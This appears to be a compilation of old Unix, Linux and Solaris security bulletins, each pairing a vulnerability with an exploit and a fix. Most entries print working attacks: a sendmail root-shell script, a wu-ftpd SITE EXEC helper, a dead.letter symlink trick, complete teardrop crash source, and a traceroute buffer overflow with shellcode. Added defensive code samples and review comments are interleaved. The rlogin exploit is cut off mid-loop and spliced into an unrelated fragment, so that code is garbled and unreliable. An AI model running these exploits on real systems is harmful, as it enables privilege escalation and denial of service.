# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
Solution
There is no way around it other than installing a newer sendmail (later than 8.8.2).
---------------------------
Title: [Security] Linux & Unix wu-FTP
Command
wu-FTP ( site exec )
Affected systems
Every Unix with the affected wu-ftpd 2.x (2.4 and earlier) installed
Problem
Because of a serious bug in SITE EXEC in an ftpd that runs as root, programs on the host can be run with
root privileges: the daemon only switches its effective uid to the logged-in user and keeps real uid 0
(see the id output below, uid=0 euid=505), so anything started through SITE EXEC can call seteuid(0)
and become root again.
cat > bug.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
}
Compile the source above with cc -o bug bug.c, then connect to your own host with ftp.
Here is an example.
ftp 0
220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) r
eady.
Name (0:guest): guest
331 Password required for guest.
Password: (password)
230 User guest logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id" (see if sys is exploitable)
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(adm) egid=100(users) groups=100(users)
200 (end of 'bash -c id')
ftp> quote "site exec bash -c /home/guest/bug"
200-bash -c /home/guest/bug
200 (end of 'bash -c /home/guest/bug')
ftp> quit
Doing the above makes the program bug run with root privileges.
When that happens, a root-privileged shell is created in the /tmp directory.
Solution
Bring ftpd up to the latest version.
Version 2.4.2 is fine.
Also, keep accounts you do not trust from using the SITE command at all.
---------------------------
Title: [Security] Linux & Unix sendmail (2)
Command
sendmail 8.8.4
System
Every system running sendmail 8.8.4
Problem
Because of a sendmail bug, when a message can neither be delivered nor bounced it is saved to a file
called dead.letter in /var/tmp, and that file is written with root privileges, following whatever
symlink has been planted under that name.
Example
ln -s /.rhosts /var/tmp/dead.letter
telnet white.hacker.securi.ty 25
mail from : security@wh.it.e.best
rcpt to : Fuck@fuck.you.haha
data
dlfjs qjrmrk dlTska..
.
quit
By doing this a .rhosts file can be created in root's home directory.
With a bit more application the password file can be tampered with.
Solution
Upgrade sendmail to 8.8.5 or later.
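The defensive side of the dead.letter bug, as an added example (not sendmail's code): any privileged program that creates a file in a world-writable directory must refuse to go through a planted symlink and must check what it actually opened. O_NOFOLLOW makes the open fail with ELOOP when the last path component is a symlink, and an fstat() on the descriptor rejects hard links and files owned by someone else. The scenario is staged in a scratch directory under /tmp, with a link named dead.letter pointing at a file that stands in for /.rhosts; both are constructed by the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` for appending the way a privileged mailer should: refuse to go
 * through a symlink (O_NOFOLLOW), refuse anything that is not a plain file
 * with one link owned by `expected_owner`. Returns an fd, or -1 with errno set. */
int open_deadletter(const char *path, uid_t expected_owner) {
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;                  /* ELOOP: the last component is a symlink */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)
        || st.st_uid != expected_owner || st.st_nlink != 1) {
        close(fd);                          /* hard link or someone else's file */
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Stage the post's attack in a scratch directory: dead.letter -> "rhosts"
 * (standing in for /.rhosts), then try to write. Returns the errno the open
 * failed with (ELOOP expected), 0 if the write went through the link, -1 on
 * setup failure. The directory and link are constructed here, not real paths. */
int attack_is_refused(void) {
    char dir[] = "/tmp/deadletterXXXXXX";
    if (!mkdtemp(dir)) return -1;
    char target[300], link[300];
    snprintf(target, sizeof target, "%s/rhosts", dir);
    snprintf(link, sizeof link, "%s/dead.letter", dir);
    int result = -1;
    if (symlink(target, link) == 0) {
        int fd = open_deadletter(link, getuid());
        result = fd < 0 ? errno : 0;
        if (fd >= 0) { (void)write(fd, "+ +\n", 4); close(fd); }
        struct stat st;
        if (stat(target, &st) == 0) result = 0;   /* target appeared: link was followed */
    }
    unlink(link); unlink(target); rmdir(dir);
    return result;
}

/* The legitimate case: a fresh path with no link present must still work. */
int plain_file_ok(void) {
    char dir[] = "/tmp/deadletterXXXXXX";
    if (!mkdtemp(dir)) return 0;
    char path[300];
    snprintf(path, sizeof path, "%s/dead.letter", dir);
    int fd = open_deadletter(path, getuid());
    int ok = fd >= 0;
    if (fd >= 0) close(fd);
    unlink(path); rmdir(dir);
    return ok;
}

int main(void) {
    int e = attack_is_refused();
    printf("symlinked dead.letter: %s\n",
           e == ELOOP ? "refused (ELOOP)" : e > 0 ? strerror(e) : e == 0 ? "FOLLOWED" : "setup failed");
    printf("plain dead.letter:     %s\n", plain_file_ok() ? "written" : "FAILED");
    return e != ELOOP;
}
```

The ownership check is what closes the remaining gap: an attacker who cannot plant a symlink can still pre-create a real dead.letter, and a root daemon appending to a file it does not own is the same class of problem.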
---------------------------
Title: [Security] Linux Lizards game
Command
Lizards game
System
Slackware 3.4
Problem
The Lizards game is a setuid program.
It is setuid because the game uses svgalib.
But if you look at the game's source, it calls system("clear").
From a user's point of view that is an obvious hole: system() hands the command to /bin/sh, which looks a
bare command name up through the caller's PATH. Set PATH=. , write your own clear script, and that
clear script runs with root privileges.
Solution
First, close the file's permissions:
chmod -s /usr/games/lizardlib/lizardshi
---------------------------
Title: [Security] Linux IP fragment overlap
Command
IP fragment overlap
System
Linux / Windows NT / Windows 95 / other Unix systems
Problem
Running the program below stops (crashes) the target. It sends two UDP fragments of one datagram where the
second starts inside the first but ends before the first does; the kernel's reassembly code ends up with a
negative copy length and dies.
/*
 * Copyright (c) 1997 route|daemon9
 * 11.3.97
 *
 * Linux/NT/95 Overlap frag bug exploit
 *
 * Exploits the overlapping IP fragment bug present in all Linux
 * kernels and NT 4.0 / Windows 95 (others?)
 *
 * Based off of: flip.c by klepto
 * Compiles on: Linux, *BSD*
 *
 * gcc -O2 teardrop.c -o teardrop
 * OR
 * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0
 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
 * withstand maybe 5 or 10 sometimes... Experiment.
 */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
/*
 * Send two IP fragments with pathological offsets. We use an implementation
 * independent way of assembling network packets that does not rely on any of
 * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
/*
 * Grab some memory for our packet, align p_ptr to point at the beginning
 * of our packet, and then fill it with zeros.
 */
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
    sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
/* We set the fragment offset to be inside of the previous packet's
 * payload (it overlaps inside the previous packet) but do not include
 * enough payload to cover complete the datagram. Just the header will
 * do, but to crash NT/95 machines, a bit larger of packet seems to work
 * better.
 */
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
    sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
/*
 * Resolve a dotted quad or a host name to a network-order address; 0 on failure.
 * The page's copy of teardrop.c lost this function (and the end of send_frags()
 * above); both are restored here so the file compiles and links.
 */
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr((char *)host_name)) == -1)
{
if (!(host_ent = gethostbyname((char *)host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\
n",
name);
exit(0);
}
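The arithmetic that kills the kernel, as an added example (not the post's code and not the kernel's): a minimal reassembly queue that trims the front of each new fragment against the fragments already queued, the way the 2.0 kernel did, and then copies `end - offset` bytes. With the post's two fragments (data bytes 0..36, then a fragment claiming offset 3*8 = 24 with 4 bytes of data) the trim moves offset to 36 while end is 28, so the old copy length is -8, which the kernel fed to memcpy as an enormous unsigned size. The `patched` flag enables the `offset > end` check from the diff below. Sizes mirror the constants in teardrop.c; the payload bytes are zeros.

```c
#include <stdio.h>
#include <string.h>

#define MAX_FRAGS 8
#define DGRAM_MAX 65536
#define REJECTED  (-1000000L)   /* distinct from any (possibly negative) copy length */

typedef struct { int offset, end; } frag_t;          /* data byte range [offset, end) */
typedef struct { frag_t frags[MAX_FRAGS]; int n; unsigned char data[DGRAM_MAX]; } reasm_t;

/* Queue a fragment whose data covers [offset, offset+len) of the datagram.
 * Mirrors the 2.0 reassembly: the front of the new fragment is trimmed back
 * to the end of any queued fragment it overlaps, then `end - offset` bytes
 * are copied. Returns that copy length (negative = the old kernel's memcpy
 * length before it was cast to unsigned), or REJECTED when `patched` is set
 * and the trim moved offset past end (the check the patch adds). */
long reasm_add(reasm_t *q, int offset, int len, const unsigned char *payload, int patched) {
    int orig_offset = offset, end = offset + len;
    if (offset < 0 || len < 0 || end > DGRAM_MAX) return REJECTED;
    for (int i = 0; i < q->n; i++)
        if (q->frags[i].offset <= offset && q->frags[i].end > offset)
            offset = q->frags[i].end;               /* skip the bytes we already have */
    if (patched && offset > end) return REJECTED;   /* teardrop: nothing sane to copy */
    long copy = (long)end - offset;
    if (copy <= 0) return copy;                     /* old code would memcpy() a huge size */
    if (q->n < MAX_FRAGS) {
        memcpy(q->data + offset, payload + (offset - orig_offset), (size_t)copy);
        q->frags[q->n++] = (frag_t){ offset, end };
    }
    return copy;
}

/* The post's two fragments: first 0..36 (UDP header + 28 padding bytes), then
 * one claiming offset 3*8 = 24 with only 4 bytes of data. Returns the second
 * call's result: -8 unpatched, REJECTED patched. */
long teardrop_result(int patched) {
    static reasm_t q;
    static unsigned char buf[64];
    memset(&q, 0, sizeof q);
    reasm_add(&q, 0, 36, buf, patched);
    return reasm_add(&q, 24, 4, buf, patched);
}

/* A legitimate overlap: 0..36 then 24..44. Trimming leaves 8 new bytes. */
long overlap_trim_result(void) {
    static reasm_t q;
    static unsigned char buf[64];
    memset(&q, 0, sizeof q);
    reasm_add(&q, 0, 36, buf, 1);
    return reasm_add(&q, 24, 20, buf, 1);
}

int main(void) {
    printf("teardrop, unpatched copy length: %ld\n", teardrop_result(0));
    printf("teardrop, patched: %s\n", teardrop_result(1) == REJECTED ? "rejected" : "accepted?!");
    printf("benign overlap, bytes actually copied: %ld\n", overlap_trim_result());
    return 0;
}
```

The benign case is why the check has to be `offset > end` rather than "reject any overlap": retransmitted and partially overlapping fragments are legal, and trimming them is the normal path; only a fragment that ends before the bytes already held is pathological.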

Solution
Upgrade the kernel to 2.0.32-pre4.
or
Change the source as follows and recompile the kernel:
--- ip_fragment.c Mon Nov 10 14:58:38 1997
+++ ip_fragment.c.patched Mon Nov 10 19:18:52 1997
@@ -12,6 +12,7 @@
* Alan Cox : Split from ip.c , see ip_input.c for
history.
* Alan Cox : Handling oversized frames
* Uriel Maimon : Accounting errors in two fringe case
s.
+ * route : IP fragment overlap bug
*/
#include
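Review bot: the context lines of this hunk will not match the target file as pasted: the changelog entries were hard-wrapped by extraction, so `history.` and `s.` sit on their own lines, and the trailing `#include` context line has lost its header name, which means patch(1) rejects the hunk. Re-export the diff from the source tree rather than applying this copy by hand; the same wrapping damage affects the `printk` line in the next hunk.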
@@ -578,6 +579,22 @@
frag_kfree_s(tmp, sizeof(struct ipfrag));
}
}
+
+ /*
+ * Uh-oh. Some one's playing some park shenanigans on us.
+ * IP fragoverlap-linux-go-b00m bug.
+ * route 11.3.97
+ */
+
+ if (offset > end)
+ {
+ skb->sk = NULL;
+ printk("IP: Invalid IP fragment (offset > end) found from %
s\n", in_ntoa(iph->saddr));
+ kfree_skb(skb, FREE_READ);
+ ip_statistics.IpReasmFails++;
+ ip_free(qp);
+ return NULL;
+ }
/*
* Insert this fragment in the chain of fragments.
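Review bot: the rejection path logs with an unconditional `printk` that includes `in_ntoa(iph->saddr)`, and the source address is attacker-controlled and spoofable, so the same sender who could crash the box before can now fill the kernel log at line rate; rate-limit or drop the message. `ip_free(qp)` also discards the whole reassembly queue for that datagram rather than just the bad `skb`, so a single forged fragment can knock out a legitimate datagram in progress; freeing only the offending fragment and letting the queue time out would be less disruptive. The check itself, `if (offset > end)`, sits right after the overlap-trimming loop that adjusts `offset`, which is the correct place for it.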
---------------------------
Title: [Security] Linux pppd chatscript
Command
Debian pppd chatscript
System
Debian Linux
Problem
/var/log/ppp.log was left readable by everyone.
$> more /var/log/ppp.log
(blah blah)
Dec 14 16:43:14 gateway chat[362]: ^Mlogin -- got it
Dec 14 16:43:14 gateway chat[362]: send (loginname^M)
Dec 14 16:43:15 gateway chat[362]: expect (word)
Dec 14 16:43:15 gateway chat[362]: : loginname^M
Dec 14 16:43:15 gateway chat[362]: Password -- got it
Dec 14 16:43:15 gateway chat[362]: send (mypassword^M)
Reading the log in this form, the password (^^;) is right there: chat logs everything it sends, the dial-up password included, and any local user can read the file.
Solution
There did not seem to be a patched version. ^^;
By now there probably is; upgrade. Until then, make the log readable only by root.
---------------------------
Title: [Security] Linux X server
Command
X server - the XF86_ series of XFree86 3.3.1, 3.2.9, 3.1.2
System
Every Unix and Linux running this X server
Problem
With the following trick the first line of any file can be read: the setuid-root server opens the file named by -config and echoes the first line it does not understand back in its error message.
$ ls -al /etc/shadow
-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
$ id
uid=502(loveyou) gid=500(users) groups=500(users)
$ cd /usr/X11R6/bin
$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:] [option]
-a # mouse acceleration (pixels)
-ac disable access control restrictions
-audit int set audit trail level
-auth file select authorization file
bc enable bug compatibility
-bs disable any backing store support
-c turns off key-click

That is the form it takes..
Solution
Remove the setuid bit, or allow only specific users to run it.
---------------------------
Title: [Security] Linux RedHat 5.0 utilities
Command
/bin/ping, /usr/sbin/traceroute, /usr/bin/rlogin, /usr/bin/rsh
(actually glibc2 is the guilty one)
System
RedHat 5.0
Problem
Root is obtained through a buffer overrun in glibc's resolver (res_query.c), reached through the host name these setuid programs pass to it.
/*
Just Your Standard EGGSHELL Proggie:
traceroute buffer overflow exploit for RedHat Linux 5.0
mostly ripped from Aleph One
Wilton Wong
wwong@blackstar.net
gcc -o trace_shell trace_shell.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 1019
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
printf("Now run: /usr/sbin/traceroute $RET\n");
system("/bin/bash");
}

Solution
Patch method (the resolver change below, shown as a diff between the glibc 2.0.6pre4 source and a patched tree):
$ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/
--- /dbase/glibc-2.0.6pre4/resolv/res_query.c Mon Jan 6 23:05:43 1997
+++ /usr/glibc/src/libc/resolv/res_query.c Mon Dec 8 09:05:53 1997
@@ -321,7 +321,7 @@
u_char *answer; /* buffer to put answer */
int anslen; /* size of answer */
{
- char nbuf[MAXDNAME];
+ char nbuf[MAXDNAME * 2 + 2]; /*À̺κÐÀ» À§¿Í ¹Ù²Ù¸é µÈ´Ù.*/
const char *longname = nbuf;
int n;
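Review bot: growing `nbuf` from `MAXDNAME` to `MAXDNAME * 2 + 2` only bounds the longest input this caller expects; nothing in the visible context shows the composition of the name into `nbuf` being length-checked, so a name longer than the new size still overflows, and the fix should pair the larger buffer with a size-checked copy (snprintf against `sizeof nbuf`, returning an error rather than truncating). The `+` line also carries an editorial comment in Korean ("change this part as above") that would be committed into res_query.c; drop it from the patch.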
---------------------------
Title: [Security] Linux crontab
Command
dillon crontab / crond ( dcron 2.2 )
System
Slackware 3.4
Problem
Root can be obtained through a buffer overflow;
a potential buffer overflow is visible in the setuid crontab.
Solution
Get the patched version from the following site.
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.tar.gz
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.diff.gz
---------------------------
Title: [Security] Solaris xterm
Command
xterm
System
Solaris 2.5.1 (SunOS 5.5.1)
Problem
A buffer overflow can be triggered through the -xrm argument, opening a security hole.

Here is the example.
/*
 * X11R6.3 xterm exploit for solaris 2.5.1 by DCRH 28/5/97
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define EXTRA2 1300
#define BUF_LENGTH 400
#define EXTRA 500
/* Need an addr such that contents of addr+0xe98 = 0 */
#define SAFE_ADDR ((unsigned)0xefff2008)
#define STACK_OFFSET 0x4800
#define SPARC_NOP 0xa61cc013
u_long sparc_shellcode[] =
{
0 /* "shellcode": the page omits the actual SPARC shellcode words */
};
u_long get_sp(void)
{
asm("mov %sp,%i0 \n");
}
char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8];
char longvar[0x4000] = "BLAH=";
void main(int argc, char *argv[])
{
char *env[2];
unsigned long targ_addr;
u_long *long_p;
int i, code_length = sizeof(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf;
for (i = 0; i < EXTRA2 / sizeof(u_long); i++)
*long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24);
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
for (i = 0; i < code_length / sizeof(u_long); i++)
*long_p++ = sparc_shellcode[i];
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
/* This is just to shove the stack down a bit */
memset(&longvar[5], 'a', sizeof longvar-6);
longvar[sizeof longvar -1] = '\0';
env[0] = longvar;
env[1] = NULL;
execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env);
perror("execl failed");
}

Solution
Obtain the wrapper from the following site and install it.
ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper
/overflow_wrapper.c
or
http://cegt201.bradley.edu/~im14u2c/wrapper/
---------------------------
Title: [Security] Solaris ff.core
Command
/usr/openwin/bin/ff.core
System
Solaris 2.4
Problem
By setting IFS=/, ff.core, which tries to run a program under /usr/??, is diverted from its intended purpose: the shell instead runs a program named usr, and the remaining path components become its arguments.
The following is the example.
% ksh
% cd /tmp
% cp /bin/ksh .
% echo "chown root ksh; chmod u+s ksh" > usr
% chmod +x usr
% export IFS=/
% (some one-line command ..)
% ./ksh
#
Solution
Apply the patch.
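The xterm and ff.core entries above share one root cause: a setuid program trusts whatever arguments and environment its caller hands it, whether that is an over-long -xrm value or an IFS that rewrites the path a shell sees. Below is an added example, written for this page and not taken from the bulletin or from the AUSCERT overflow_wrapper it links to, of a small C wrapper that refuses over-long argv and environment entries before exec and then replaces the environment wholesale with a fixed minimal one. REAL_PROG, MAX_ARG_LEN and the sample argument and environment vectors are placeholders chosen for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define REAL_PROG   "/usr/openwin/bin/xterm.real"  /* placeholder: the real setuid binary */
#define MAX_ARG_LEN 256                             /* placeholder bound per argv/env entry */

/* Index of the first entry in a NULL-terminated vector longer than max,
 * or -1 when every entry is within bounds. */
int first_oversized(char *const vec[], size_t max)
{
    for (int i = 0; vec[i] != NULL; i++)
        if (strlen(vec[i]) > max)
            return i;
    return -1;
}

/* 1 if the NULL-terminated environment carries a variable that the shell
 * (IFS) or the dynamic linker (LD_*) would honour on the caller's behalf. */
int env_has_unsafe_var(char *const envp[])
{
    for (int i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], "IFS=", 4) == 0 || strncmp(envp[i], "LD_", 3) == 0)
            return 1;
    return 0;
}

/* The only environment the real program ever sees. */
char *const safe_env[] = { "PATH=/usr/bin:/bin", NULL };

/* Constructed samples: a normal xterm invocation and an environment with IFS set. */
char *const sample_args[]    = { "xterm", "-xrm", "*background: black", NULL };
char *const sample_bad_env[] = { "HOME=/home/alice", "IFS=/", NULL };

/* Builds an argv whose third entry is MAX_ARG_LEN+1 bytes, the shape of the
 * overflow above, and returns the index the check reports for it (2). */
int oversized_index_demo(void)
{
    char big[MAX_ARG_LEN + 2];
    memset(big, 'a', MAX_ARG_LEN + 1);
    big[MAX_ARG_LEN + 1] = '\0';
    char *const vec[] = { "xterm", "-xrm", big, NULL };
    return first_oversized(vec, MAX_ARG_LEN);
}

int main(int argc, char *argv[])
{
    extern char **environ;
    int bad;

    (void)argc;
    if ((bad = first_oversized(argv, MAX_ARG_LEN)) != -1) {
        fprintf(stderr, "wrapper: argv[%d] exceeds %d bytes, refusing\n", bad, MAX_ARG_LEN);
        return 1;
    }
    /* The exploit above also pads the environment to shift the stack, so
     * environment entries are bounded the same way. */
    if ((bad = first_oversized(environ, MAX_ARG_LEN)) != -1) {
        fprintf(stderr, "wrapper: environment entry %d exceeds %d bytes, refusing\n", bad, MAX_ARG_LEN);
        return 1;
    }
    if (env_has_unsafe_var(environ))
        fprintf(stderr, "wrapper: IFS/LD_* present in environment; dropped\n");

    /* Hand over a fixed environment regardless of what the caller supplied. */
    argv[0] = REAL_PROG;
    execve(REAL_PROG, argv, safe_env);
    perror("wrapper: execve " REAL_PROG);
    return 1;
}
```

The wrapper is installed setuid in place of the original binary, which is renamed to REAL_PROG and stripped of its setuid bit so it can only be reached through the checks; the bound must be set per program from the longest legitimate argument it accepts.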
---------------------------
Title: [Security] Solaris gethostbyname()
Command
gethostbyname()
System
Solaris 2.5, 2.5.1
Problem
Triggers a buffer overflow and runs a shell.. owned by root.
Here is the example.
/*
* rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
* by exploiting the gethostbyname() overflow in rlogin.
*
* gcc -o rlogin-exploit rlogin-exploit.c
*
* Jeremy Elson, 18 Nov 1996
* jeremy.elson@nih.gov
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] = "shellcode";   /* elided by the author */

u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
long_p = (u_long *) buf;
for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
